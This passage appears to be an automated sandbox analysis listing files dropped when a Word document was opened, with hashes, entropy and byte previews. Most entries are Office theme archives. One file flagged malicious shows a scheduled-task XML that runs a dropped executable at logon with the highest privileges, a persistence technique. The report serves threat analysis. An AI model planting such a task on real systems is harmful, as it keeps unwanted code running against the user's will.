                                                                                                                                                Preview:MSCF....lh......D...............P...........lh...?..........|..................M. .Berlin.thmx............M. .content.inf..lH.lj..[...............7.I..)........P..5x.B/^y5.xk^^......D.F........s....y...?D.....*.....&....".o..pl..Q.jm?_...6......=%.p.{.)S..y...$......,4..>#.........)..."-....K....4.E...L=.......4..p.c..nQ.0..ZO.#.....e.N..`U......oS....V..X[t.E)|.h..R....$..}.{.F.7....^.....w.,...5rBR.....{.......mi...h.b......w+..;.hV......q..(.7&.Z.l...C."j........[-E4h.....v&..~.p$|\X...8.....Fj'%,.)6w...u|C..,y..E..`*Up../(....2.(....Z.....,.'...d..s..Z....5.g.?Nq..04...f...D.x....q+.b.."v`{.NL....C..... ..n......1N+.I.{W9....2r.0...BaC.....O..=...k..."..8.D\jK.B...Aj....6,B..2...I.. B..^.4..1.K+.....DP...Mr....9..x[...>........?.Zd..'._2.._..>..'.F..#.w...2..~.|........q_Wy.W.....~..Qex.km/..f......t.q..p..gm.|.x.... ,.#\Z....p....a.}...%..v.J.Es......I.b.P?...0......F.x....E..j..6.%..E..-O.k...b .^.h.Cv...Z....D.n.d:.d.F..x...[1...B..

                                                                                                                                                C:\Users\user\AppData\Local\Temp\cab739C.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 937309 bytes, 2 files, at 0x44 +A "content.inf" +A "Gallery.thmx", flags 0x4, ID 44349, number 1, extra bytes 20 in head, 34 datablocks, 0x1503 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):953453
                                                                                                                                                Entropy (8bit):7.99899040756787
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:24576:9B1Onw3vg7aeYPagzbJ5Vhv6LnV2Dhl7GEYqVjcyd:vww3o7BYPJbJ5Vh6UCqZfd
                                                                                                                                                MD5:D4EAC009E9E7B64B8B001AE82B8102FA
                                                                                                                                                SHA1:D8D166494D5813DB20EA1231DA4B1F8A9B312119
                                                                                                                                                SHA-256:8B0631DA4DC79E036251379A0A68C3BA977F14BCC797BA0EB9692F8BB90DDB4D
                                                                                                                                                SHA-512:561653F9920661027D006E7DEF7FB27DE23B934E4860E0DF78C97D183B7CEBD9DCE0D395E2018EEF1C02FC6818A179A661E18A2C26C4180AFEE5EF4F9C9C6035
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:MSCF....]M......D...............=...........]M...?..........}..."..............Li. .content.inf............Li. .Gallery.thmx.].(.Vq..[.....0Y..........v.....w.wwwww.wwwwww.w.....".83....y8..mg...o*..U..N(..@uD.:O<........{.G....~~.....c.c.5..6./|G .@#1O.B.............PT@...b.d.~..U....B.{.........0.H.....`.H.`..'S.......Ic..W..x...z....... .........g......._....o......S......p...$....._........._...K......x..?.6.U~...'./.r.................../.......5.8..2........2b.@j ....0.........``....H... ,5...........X........|..Y.QoiW..*|.......x.sO8...Yb....7...m..b.f.hv..b......=...:Ar.-...[..A\.D..g..u....].9..M...'.R-`.....<..+.....]...1.^..I.z..W{.._....L.. ...4;..6O.....9,.-.Vt+b/$7..}.O05.Y...-..S.....$*.....1."Z.r;.!..E.mMN..s .U...P%.[.P...cU...j...h.d.../.s..N/..:..X*...p5.7\}h.Q ..._.F.X.C..z$.nV..+.k..|.@.L...&.........^#.G.a..x..w!wx.8e+..E. i..$?9..8...:......|..[."..y..&y..?...W....s..._...3Z0c.....i.q.........1c.jI....W..^%xH.._...n.......&J..

                                                                                                                                                C:\Users\user\AppData\Local\Temp\cab73DB.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 1049713 bytes, 2 files, at 0x44 +A "content.inf" +A "Savon.thmx", flags 0x4, ID 60609, number 1, extra bytes 20 in head, 37 datablocks, 0x1503 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1065873
                                                                                                                                                Entropy (8bit):7.998277814657051
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:24576:qehtHA3nsAOx7yN7THwxdGpkw8R60aTcua5U4c:hhmnsBMNAxdGpV5za5Uv
                                                                                                                                                MD5:E1101CCA6E3FEDB28B57AF4C41B50D37
                                                                                                                                                SHA1:990421B1D858B756E6695B004B26CDCCAE478C23
                                                                                                                                                SHA-256:69B2675E47917A9469F771D0C634BD62B2DFA0F5D4AF3FD7AFE9196BF889C19E
                                                                                                                                                SHA-512:B1EDEA65B6D0705A298BFF85FC894A11C1F86B43FAC3C2149D0BD4A13EDCD744AF337957CBC21A33AB7A948C11EA9F389F3A896B6B1423A504E7028C71300C44
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:MSCF....q.......D...........................q... ?..........{...%..............M. .content.inf.Q_.........M. .Savon.thmx...O>.o..[..............&.5....UUcC.C....A...`TU...F....".54.E.....g.-.7-D....1g...p.6......@..w(....h'?.....(..........p..J.2n$4.........A......?...........@.C.W.R.5X..:..*..I..?....r.y..~!.....!.A.a...!........O.........5.x<C...?.?....C.C.......'....F../....../.$................4.7...................P...(.w.}6.........7.....01.1r........._..?.............'.._..JOx.CFA<.........*0..2.?...>F.../...;..6-8..4...8&yb....".1%..v'..N...x......}.gYb..~L.....f[..!......Y.G.....p..r...?.p...F.Vy.....o.Whll...+...M.V...:.]...B.%.H....n..@.].zaVxf...y{.@....V.t.W....$Kp-.....7W.J..h..0A3mK.=.ub..R...W......*'T2..G#G,.^..T..XZu...U. ...76.d..#.I.JB.v...d...%.....6..O.K.[.:.L.\.....1.D..2a.>f......X...b5...ZgN.u.f...a!..."...sx....>..?.a.3.8.^._q..JS1.E..9..Lg.n.+....lE.f:j.9)Q..H1=..<.R.......{c>:.p[..S.9h.a.gL.U....8.z..z.!.....2I.~.b..2..c...

                                                                                                                                                C:\Users\user\AppData\Local\Temp\cab741B.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 1081343 bytes, 2 files, at 0x44 +A "Circuit.thmx" +A "content.inf", flags 0x4, ID 11309, number 1, extra bytes 20 in head, 45 datablocks, 0x1503 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1097591
                                                                                                                                                Entropy (8bit):7.99825462915052
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:24576:UE9BMy98gA4cDWHkSrDans3MfEE6w8OaVuCibol0j41dwD:UE9Bdy3D4keQWt7w85VuVoaj4/Q
                                                                                                                                                MD5:BF95E967E7D1CEC8EFE426BC0127D3DE
                                                                                                                                                SHA1:BA44C5500A36D748A9A60A23DB47116D37FD61BC
                                                                                                                                                SHA-256:4C3B008E0EB10A722D8FEDB325BFB97EDAA609B1E901295F224DD4CB4DF5FC26
                                                                                                                                                SHA-512:0697E394ABAC429B00C3A4F8DB9F509E5D45FF91F3C2AF2C2A330D465825F058778C06B129865B6107A0731762AD73777389BB0E319B53E6B28C363232FA2CE8
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:MSCF............D...............-,..............x?..........}...-...RU.........M. .Circuit.thmx.....RU.....M. .content.inf.g...&|..[......=..R.....=.*,.!QA?h..Q.!....Uk!.HJ.......VKuk.....q.w.w.U.....;...K.@.URA..0..B..|rv.ND(.`{..@.1.}...s?.....-...O.(V.w..1..a.....aW...a.Z..aX....5.I...!..........(. ./.d...me.( ..f.........w.......Xp.s....c..vB.98.....C.J......V ..ML.M...B.n.>...|....u!.5@t..q4....(K...u qL.S....>/%v%.2..TF.].e..'..-..L.N..c].a..(WU\o.%^..;...|o.6..L..[..;&....^p.Lu.sr,-.R=.:.8.>VOB...:.?$.*h.o....Zh.h....`.B.c.../K......b^...;2..bY.[.V.Q8....@..V7....I0c.cQN7..I.p..}..!..M....1K....+....9.2......a..W.V..........;.J .i......]%O.-......CeQ.0.c....MbP3.0.w..8w..Y...|...H;#.J.+M......>.`y..aWk|.i.BF.pJv;.....S..6....F.....RLG~..........J.=......"..........H.....h..o...u........M.6F?.F.p.B.>./*l....J.R..#P.....K......<iu..gm^..n...#c..zO"7M.O......4'>A..(.E.Cy.N.)....6.tx.r[.....7.......m.t..E?.....5.5.6.\..{.V.T.D.j..=~a^.I

                                                                                                                                                C:\Users\user\AppData\Local\Temp\cab75C1.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 1291243 bytes, 2 files, at 0x44 +A "content.inf" +A "Droplet.thmx", flags 0x4, ID 47417, number 1, extra bytes 20 in head, 54 datablocks, 0x1503 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1310275
                                                                                                                                                Entropy (8bit):7.9985829899274385
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:24576:NN3M9UHpHZE4aubaPubP3M6d71FdtmFAjq+54/79LVzG+VnS:NN3M9UJHZE4abPyU4JtmFCq+q/7JlVS
                                                                                                                                                MD5:9C9F49A47222C18025CC25575337A965
                                                                                                                                                SHA1:E42EDB33471D7C1752DCC42C06DD3F9FDA8B25F0
                                                                                                                                                SHA-256:ADA7EFF0676D9CCE1935D5485F3DDE35C594D343658FB1DA42CB5A48FC3FC16A
                                                                                                                                                SHA-512:9FDCBAB988CBE97BFD931B727D31BA6B8ECF795D0679A714B9AFBC2C26E7DCF529E7A51289C7A1AE7EF04F4A923C2D7966D5AF7C0BC766DCD0FCA90251576794
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:MSCF...........D...............9..............XJ..........}...6..............M.. .content.inf............M.. .Droplet.thmx..m7.>J..[...............2.QQPIj.*.."o^R.H5*^...^(e.W...R..x..^`..m...."..+.....{o.......Q.-....$V.N>...T]..L.... ..N.h..dOY.......S......N.%.d..d....Y.....e..$...<.m...`............@....=.z..n..[...,G..1Fn.qPDH{C<...3.Q...2..r..*...E.E.E.ErM"&a..'..W....:...?I..<.I..6o.`.d.?!..!..._.4\.._.E..).._O.S....; ..#..p.H.....c....o\.K..?$U.e.........!...J.v.....gNe._..[....#A.O.n_.....gm:P._.........{@..-g..j.69b.NH.I.$Hk?.6.n...@......'.C.._.U..:*,j.-G.....e.#.Sr.t.L......d[.[...s.....rx.3.F[.5o..:....K*.x..)M.fb...3IP.&h.Q.VX^%U.......x..l......@6.k.P..zSW.?....F..[L...4..b.l.w."&.....`.j...i.5}".~.-.....{\.:...o.'H\*+)....3.Y......\...f:.;....e........4't7..f...w..j...3....N..9`.J...P..?.....=3_.y]...f.<.......JM5.}Q/ .F.a..Z.._yh......V..>m .......a....f....!.hz..\.....F_..'z...,....h.=.......=.o..T....3.e..........$..g.2.

                                                                                                                                                C:\Users\user\AppData\Local\Temp\cab7826.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 1750009 bytes, 2 files, at 0x44 +A "content.inf" +A "Slate.thmx", flags 0x4, ID 28969, number 1, extra bytes 20 in head, 72 datablocks, 0x1503 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1766185
                                                                                                                                                Entropy (8bit):7.9991290831091115
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:24576:O/gjMj+RP9Q07h9F75a0BXjBccHMVk2Hq2SkGa0QglyZtxmdPP2LcSUtfgfp16Yx:kJ6RP9Q07/X5V7yVF0QgktxAPutUt0zP
                                                                                                                                                MD5:828F96031F40BF8EBCB5E52AAEEB7E4C
                                                                                                                                                SHA1:CACC32738A0A66C8FE51A81ED8E27A6F82E69EB2
                                                                                                                                                SHA-256:640AD075B555D4A2143F909EAFD91F54076F5DDE42A2B11CD897BC564B5D7FF7
                                                                                                                                                SHA-512:61F6355FF4D984931E79624394CCCA217054AE0F61B9AF1A1EDED5ACCA3D6FEF8940E338C313BE63FC766E6E7161CAFA0C8AE44AD4E0BE26C22FF17E2E6ABAF7
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:MSCF............D...............)q..............0?..........{...H..............M.. .content.inf.;.#........M.. .Slate.thmx.p.+..P..[......U..............p..K.!.......*...K..w..v........=....D$r...B....6 ...X.F0..d..m.s...$$r........m.)6.m3....vXn.l..o...a...V......Ru.:=2M.........T.....4S`EP......\..r,..v...G.P......'._H0]..%_............X.P.,.............H.?.-.H..".......M..&..o....R........<......`...D.H.._.G.Qv..(.*.U,.9..D...."..T..i.e../.e.."....,S...o.X.....c./..V....Z..o.O..2....{...+... ....0.@J.R.Q.m.....{.....h?u.q.O{...l.d)..Yk`.....#...u.-.m..#CXwrz4..7.>......v.E:.#.oGSKS.TX.Chm.4aQ......avH..{..j+@6[k].....`c..W8..j.v.Zh.]....4......K..#Hzyd..K}.....H|<H..\(l...+..%Z......~.S:^..d>..1..H%..7N-v.....Wu.*..b^.B.....k0gc.2.{.!...E7.}3.d...{.Ye...&#f6...:2......v..&!..k0d.p.b...,..$.....Y..60...h.N}.r...<[./........{...Es..&.nf.....2.@Fh3.9.G....l.[.C..SD/6.H.K....}..m....M..........gl.P.]..I......5....e.c...V....P...[.=.......O.eq+

                                                                                                                                                C:\Users\user\AppData\Local\Temp\cab7908.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 1865728 bytes, 2 files, at 0x44 +A "content.inf" +A "Damask.thmx", flags 0x4, ID 63852, number 1, extra bytes 20 in head, 68 datablocks, 0x1503 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1881952
                                                                                                                                                Entropy (8bit):7.999066394602922
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:49152:6Wp9u/ZAvKz7ZFCejPiSmYXKIr6kBwBUA:6W6Bn7ZFNiiKo2l
                                                                                                                                                MD5:53C5F45B22E133B28D4BD3B5A350FDBD
                                                                                                                                                SHA1:D180CFB1438D27F76E1919DA3E84F307CB83434F
                                                                                                                                                SHA-256:8AF4C7CAC47D2B9C7ADEADF276EDAE830B4CC5FFE7E765E3C3D7B3FADCB5F273
                                                                                                                                                SHA-512:46AD3DA58C63CA62FCFC4FAF9A7B5B320F4898A1E84EEF4DE16E0C0843BAFE078982FC9F78C5AC6511740B35382400B5F7AC3AE99BB52E32AD9639437DB481D1
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:MSCF.....x......D...............l............x..`?..........|...D..............M[. .content.inf...!........M[. .Damask.thmx...o.PI..[.............../.TU.jj0..3jCUPU.jF...m.UU.P}.....PU..*........w..#....E..].................A.. w.$..@..'g.......6%:..r9..d.M;M+.r.8[d{.s..dh..(P..........!.. ..ne..f.Nc..#..Y..q....KB}..b].@..F.&.t....E.........@&.m......$w......q...:.H....p.p.....?.9x.. .....?...ao....I....................o......g.u..;."....O;....{..(k..._.w/.Z......Jb..P.O?...........?....F....ty..72......! #....v..J......?.....!,.5.7..Em.....is.h.. \.H*)i1v..zwp.....P.....x].X{O//..\....Z>z....6...+..a.c...;.K..+...?014..p.w%o^.....]...MguF...`....r.S.......eF..):.dnk#.p{..<..{..Ym...>...H......x.}.hI..M....e......*G.&.?..~.~G6.....+...D..p...._...T....F6.[Cx./Q..Xe.>.;.}>.^..:..SB.X..2.......(A..&j9....\\.......Haf+]Y...$t^Y=........><.w....tL../E...%6.Vr~MI...l.....<.0.I....7.Q8y.f.uu...I.p..O..eYYS.O......9..Qo.......:..........o.............{

                                                                                                                                                C:\Users\user\AppData\Local\Temp\cab7CF8.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 2573508 bytes, 2 files, at 0x44 +A "content.inf" +A "Mesh.thmx", flags 0x4, ID 62129, number 1, extra bytes 20 in head, 94 datablocks, 0x1503 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2591108
                                                                                                                                                Entropy (8bit):7.999030891647433
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:49152:ZSBBeAefkpB5iXfQJgi7JBaCCRZ3cM2VDHkvSJO6qzI1tE9Rn:EBI6gbCkMPDHKSJO6qsP6n
                                                                                                                                                MD5:BEB12A0464D096CA33BAEA4352CE800F
                                                                                                                                                SHA1:F678D650B4A41676BA05C836D462F34BDC5BF648
                                                                                                                                                SHA-256:A44166F5C9F2553555A43586BA5DB1C1DE54D72D308A48268F27C6A00076B1CA
                                                                                                                                                SHA-512:B6E7CCD1ECBB9A49FC72E40771725825DAF41DDB2FF8EA4ECCE18B8FA1A59D3B2C474ADD055F30DA58C7E833A6E6555EBB77CCC324B61CA337187B4B41F7008B
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:MSCF.....D'.....D............................D'..D..........z...^..............M7. .content.inf............M7. .Mesh.thmx....&~j..[.....0.................]............ww,v.\....D......3m..m!f..0..E{..?..`..A...k.:....I..........|bmG.FS...f.;.J.vzb.......R.......-....|.......ESD.....".4M..M..t.N....y..,..#.4.5.2.......'.8.Q..3.D..T....!.......&rJg...s........(..9........Dw..'....9.-..G.c............E.. .O.....a..O.._..s..)7Wz~....bJ..D...o....0..R/.#...?.......~6.Q?....?y...g.?............TP..r-...>....-..!.6...B.....\../...2....4...p$...Oge.G.?.....S.#x(..$.A~.U.%f....dJ..S.f{.g.._..3{.fm2.....Z.\o&.[k.m....ko.8..r.-.Go.OQ..'!6..f.L...Ud.$.q*.L.....R.. J.T&4g...7.2K...#k.[.].:....lk.....;c..DRx.`..&L..cpv*.>.Ngz~.{..v5.\...'C.<R:.C8.|.fE{......K...).....T...gz}..rF..Q.dof7.....D.f=cm...U|.O.]F...5zg(.. ....S..._?D....^..+.i...Z.....+X..U!4qy..._..`I..>./.W.7......=.O....BG..=..%9|...3.?...}.$"..H..u...0.......a..:t?.....8...Z..#g.=<.e.`\......KQ..U....

                                                                                                                                                C:\Users\user\AppData\Local\Temp\cab7DA5.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 2511552 bytes, 2 files, at 0x44 +A "content.inf" +A "Main_Event.thmx", flags 0x4, ID 59889, number 1, extra bytes 20 in head, 90 datablocks, 0x1503 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2527736
                                                                                                                                                Entropy (8bit):7.992272975565323
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:49152:NFXdpz4d98p/q5jA4q+9Uf5kx6wHR8WfPJZVhWzH4dRze76YP9nJ7yyAInT76nSY:NFXdKx5sM9SmxHKexZVhutJJVpCSqa0Z
                                                                                                                                                MD5:F256ACA509B4C6C0144D278C7036B0A8
                                                                                                                                                SHA1:93F6106D0759AFD0061F73B876AA9CAB05AA8EF6
                                                                                                                                                SHA-256:AD26761D59F1FA9783C2F49184A2E8FE55FCD46CD3C49FFC099C02310649DC67
                                                                                                                                                SHA-512:08C57661F8CC9B547BBE42B4A5F8072B979E93346679ADE23CA685C0085F7BC14C26707B3D3C02F124359EBB640816E13763C7546FF095C96D2BB090320F3A95
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:MSCF.....R&.....D............................R&.8?..............Z..............M). .content.inf..,........M). .Main_Event.thmx......R..[...............=.1.^xa..^...../..^x....QA^"....^/.I.{/F..F..........6Vn. ..._Hmc......<....#.{.@.....Xl../Y....Ye..'V.f.S.Vf.T..0t+..y...5O...{.....-.dT...........!...[ .ns..k.....QAA.. ....B..u.`.....{.\u8.0.....@t........K....@..w.......>...-1F...........1.E....O............_M.m..CP.O......X......g......].../..:C...Q...i.._"...M..1o...S../...9....k;...}S........y..;1o....1h......t.CL.3...].@...T...4.6.}.....M...f...[.s.."f....nZ.W......0.c.{.`.^..Oo.[.JT.2].^.f..a....kO......Q..G..s.5...V.Wj.....e...I,]...SHa..U.N.N.....v.C.....x..J{.Z.t...]WN...77BO-J......g......3:i..2..EFeL.,n..t:..,~4gt.w...M.5.'h.L..#..A&.O.ys%K.Z....F.PW..=jH...jGB.i..j.J.^.#.\n...J@.....-5.f.1jZ68.o...H2.......$O...>..ld&,#$.&_....yl.fkP$.........l....s....i.tx.~<.z...>..2.Gx..B..z.E.3.N<....`$.....b..?.w.[.X..1.=q!.s......v.......r.w

                                                                                                                                                C:\Users\user\AppData\Local\Temp\cab8161.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 3239239 bytes, 2 files, at 0x44 +A "content.inf" +A "Vapor_Trail.thmx", flags 0x4, ID 19811, number 1, extra bytes 20 in head, 111 datablocks, 0x1503 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):3256855
                                                                                                                                                Entropy (8bit):7.996842935632312
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:98304:wh7I1aeH9YvgK+A+a7GiiQzP4YZDpQ2+Sd6Y:w21ay93aypQzzhpBL/
                                                                                                                                                MD5:8867BDF5FC754DA9DA6F5BA341334595
                                                                                                                                                SHA1:5067CCE84C6C682B75C1EF3DEA067A8D58D80FA9
                                                                                                                                                SHA-256:42323DD1D3E88C3207E16E0C95CA1048F2E4CD66183AD23B90171DA381D37B58
                                                                                                                                                SHA-512:93421D7FE305D27E7E2FD8521A8B328063CD22FE4DE67CCCF5D3B8F0258EF28027195C53062D179CD2EBA3A7E6F6A34A7A29297D4AF57650AA6DD19D1EF8413D
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:MSCF....Gm1.....D...............cM..........Gm1..D..............o... ..........MP. .content.inf...7. ......MP. .Vapor_Trail.thmx..n...N..[......L........7...+I..x...P7/...BH..Rm.\yqi.x..B....{.m.............=.....p.%.@......BpV.[......C.4..X./..Y.'SB..........0.Gr.FG.).....R\...2..Jt..1..._.4_B..................cn7H.-.....Q...1..G{G.~.. '.$......@.(....=@=..`....@.@.A. ....'.4`. .@....D...'....S.s..9.7" /....?.aY.c.........LG....k...?_.....P.....?.1.....FB..m..t...['......:...?...W..../~..z.Tr...X.@...._....3..N..p.....b...t.....^..t...~..t.8A...t_....D..3R.Z.=..{.A.8).3-5..v.isz....0A~%.s.D.4....k.K......8......)R.}f.E..n.g&:W...'E....4%T..>......b.y..[..zI....e...j.s....F.....|7826U.C.,..BY.U.F.f......"..#.m..,..._...#.\.....gPP.2.}Kas......g..3.d0.Z.Z.]..n......MY]6.....].m..D.6...?.n.20.,.#...S...JK..#.W.%.Z4.....i..CBf...../..z......n.N...U.....8t...ny...=.!..#..SF..e...1.P..@.Qx*.f.;..t..S.>..... F..)...@.Y..5j....x....vI.mM....Z.W..77...

                                                                                                                                                C:\Users\user\AppData\Local\Temp\cab81C2.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 3400898 bytes, 2 files, at 0x4c "Insight design set.dotx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 106 datablocks, 0x1203 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):3417042
                                                                                                                                                Entropy (8bit):7.997652455069165
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:98304:1YYkj2mRz6vkkB15AW4QD0ms+FdniD60bDUpS:qYkj7d6vP7NZDLn+PM8
                                                                                                                                                MD5:749C3615E54C8E6875518CFD84E5A1B2
                                                                                                                                                SHA1:64D51EB1156E850ECA706B00961C8B101F5AC2FC
                                                                                                                                                SHA-256:F2D2DF37366F8E49106980377D2448080879027C380D90D5A25DA3BDAD771F8C
                                                                                                                                                SHA-512:A5F591BA5C31513BD52BBFC5C6CAA79C036C7B50A55C4FDF96C84D311CCDCF1341F1665F1DA436D3744094280F98660481DCA4AA30BCEB3A7FCCB2A62412DC99
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:MSCF......3.....L.............................3..?..............j.....3.....t.4.............Insight design set.dotx.................Content.inf...QJ.N..[.........R.....L....N).J|E.B.$.B).3,...n.....JW....k.U1..M...3#.5....$^.....;vR...Z.nj...#......^*......a.{..(..o.v...!L`...T.-&jZ`.\.*0.....G.."b.m..F.X......$>%..?.D..H.l.j....$.......MrQ......q-....hx...6.D.3...j....n..U#R..3....sm?..xJr..............$G8..t.g...?.g.}......$P._...7.#..w..9DR....*lu....?..'.Ai..v.vl..`......B..N_....W./.;...c=oYW.lL'bv.......+...9.P..B=...*Y.SX=EL.5o....?H.e|.Fn.M[...d.v.....i......9..U..H....uq.Nrn..@..e...3....8.....s8}z..$........B....26...d..?.l....=.aeM.[..|n....H.;..7A.`....=.F...V.Y.l..8.........%e.x0S.....~..2..%.....U..#.r_.0V.v.6w.l.......Y.........v..o+....*sn.$^'.Il...akUU....w....~.....&8.Vwj.....Q.uQ..&..G.($.2.s.?m.B.~j.*..+G.W..qi..g..5.)){O........o.ow.(;.{...y;n...J...&.F2.@.;......[{'w..........`....czW.........?W...}..w....x..........

                                                                                                                                                C:\Users\user\AppData\Local\Temp\tmp80A6.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
                                                                                                                                                File Type:ASCII text
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1059
                                                                                                                                                Entropy (8bit):3.9051627621358747
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:FLJ+DW2SFFkFmMMLGId1L6AEJl7XpShhJKShe/Q0QK1++xNHSuVPnBdxv3n:FLJ+S3Mmd1L6ztMhEMOQ0Q+OuVjxvn
                                                                                                                                                MD5:BD4ED5E63E9EDFCE6BBF0770ED891550
                                                                                                                                                SHA1:990E5BC692E763957C72BC99D5FFD13B51B785FC
                                                                                                                                                SHA-256:9FF19D4A5A46A8D77A2898ADA4AB15324BFBF269A8D4BC6A3CA9A3321DDA0106
                                                                                                                                                SHA-512:45C99FB3ABABEBF7FF959B918E74BDD3E0C8DEF98E7A510734B236A9A57ADF6BCAF8E4D837CE635E27D208AA5D9617B86C1095FB7910340BE47B099448E1969A
                                                                                                                                                Malicious:true
                                                                                                                                                Preview:. <Task xmlns='http://schemas.microsoft.com/windows/2004/02/mit/task'>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id='Author'>. <LogonType>InteractiveToken</LogonType>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. </Settings>. <Actions>. <Exec>. <Command>C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe</Command>. <

                                                                                                                                                C:\Users\user\AppData\Local\Temp\~$ .doc

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):162
                                                                                                                                                Entropy (8bit):2.9001324272050257
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:iXKWJRMlW8O9Z3Run/n/lfllmXfjaiuP:i/fMlW8O2IX7WP
                                                                                                                                                MD5:9A17B69D3BABD1B79E237CEB764F7379
                                                                                                                                                SHA1:C1FD2477B889D95AFEDA1F4DB748901A99681C46
                                                                                                                                                SHA-256:E9668C9AA431D9294DD7F7F1EE48D1766AA3AA09707E06C94D33FDD6F9C6C527
                                                                                                                                                SHA-512:78207B63F941DBDB4B6DF0ED322147AE2EE85CD68A186680B20CE3874706C968857578C802273FFB2092E463004838505668EF44E431973D87F86F3CE463E75B
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:.user..............................................f.r.o.n.t.d.e.s.k.......$.........aKj...............................................$."..}.j.........=Kj

                                                                                                                                                C:\Users\user\AppData\Local\Temp\~DFF0284697DC7A81D1.TMP

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):512
                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3::
                                                                                                                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\MSO3072.acl

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):30
